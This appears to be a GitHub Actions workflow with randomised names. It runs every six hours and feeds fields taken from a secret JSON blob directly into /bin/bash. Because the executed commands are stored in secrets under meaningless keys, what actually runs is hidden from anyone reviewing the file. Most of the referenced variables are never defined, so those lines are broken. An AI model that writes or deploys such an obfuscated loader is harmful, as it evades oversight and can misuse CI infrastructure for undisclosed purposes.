name: liucanbai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '40 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liucanbai3456
        env:
          lnf0: ${{ secrets.lnf0 }}
        run: |
          echo $lnf0 | jq -r .us0666 | /bin/bash
          echo $gshw3 | jq -r .vgs46486 | /bin/bash
          echo $jhlq20 | jq -r .o85 | /bin/bash
          echo $ny7623 | jq -r .tdn6457 | /bin/bash
          echo $cdev80665 | jq -r .bfir9 | /bin/bash
          echo $bnt825 | jq -r .sem5260 | /bin/bash

